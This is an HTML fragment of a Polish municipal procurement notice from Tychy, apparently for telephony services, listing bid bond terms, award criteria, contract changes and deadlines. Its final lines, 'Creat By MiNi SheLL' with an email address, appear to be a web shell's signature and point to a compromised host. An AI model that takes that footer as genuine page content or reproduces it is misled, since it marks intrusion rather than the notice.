                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Oferta musi być zabezpieczona wadium w wysokości 15 000,00 PLN (słownie: piętnaście tysięcy złotych 00/100 PLN);
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu:
przelewem z konta na konto na rachunek bankowy zamawiającego: 
Rachunek: 12 1240 2975 1111 0010 6077 6489
Bank Polska Kasa Opieki Spółka Akcyjna
Kod Swift (wymagany przy przelewach międzynarodowych): PKOP PL PW 
b) poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2016 r. poz. 359).

W przypadku wniesienia wadium w formach określonych w ppkt b do e dokument winien być wystawiony na Gminę Miasta Tychy, Al. Niepodległości 49, 43-100 Tychy.

Zamawiający wymaga, aby w przypadku wniesienia wadium w formie:
- pieniężnej  dokument potwierdzający dokonanie przelewu wadium został załączony do oferty,
- innej niż pieniądz  oryginał dokumentu został załączony do oferty. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>15</td></tr><tr><td>wymiana sprzętu</td><td>12</td></tr><tr><td>platforma do zarządania numerami i tworzenia bilingów</td><td>8</td></tr><tr><td>czas naprawy sprzętu</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Istotne postanowienia umowy stanowią załącznik nr 3 do SIWZ.
2. W niniejszym postępowaniu o udzielenie zamówienia zamawiający przewiduje możliwości zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty.
3. Warunki zmiany są następujące:
Strony przewidują możliwość zmiany wysokości wynagrodzenia wykonawcy w następujących warunkach:
1) w przypadku zmiany stawki podatku od towarów i usług,
2) w wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/12/2016, godzina: 10:15,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.Oferta musi zawierać następujące oświadczenia i dokumenty:
- wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego załącznik nr 1 do SIWZ;
- wypełniony formularz cenowy sporządzony zgodnie z załącznikiem nr 1d do SIWZ wraz z wersją elektroniczną dołączoną do oferty (np. na płycie CD).
Do obliczenia wartości oferty należy uwzględnić daty wygaśnięcia umowy u obecnego operatora. W przypadku podpisania umowy, lub braku możliwości przeniesienia numerów telefonicznych w wyżej określonym czasie Zamawiający  przedłuży umowę na czas nieokreślony.  W tym przypadku wartość umowy zostanie proporcjonalnie pomniejszona.
- oświadczenia wymienione w pkt 7.1  7.4 SIWZ (załącznik nr 2 do SIWZ);
- dowód wpłaty wadium;
- pełnomocnictwo lub umowa podmiotów występujących wspólnie wskazujące, że osoba występująca w imieniu wykonawcy jest do tego upoważniona (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza). 
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com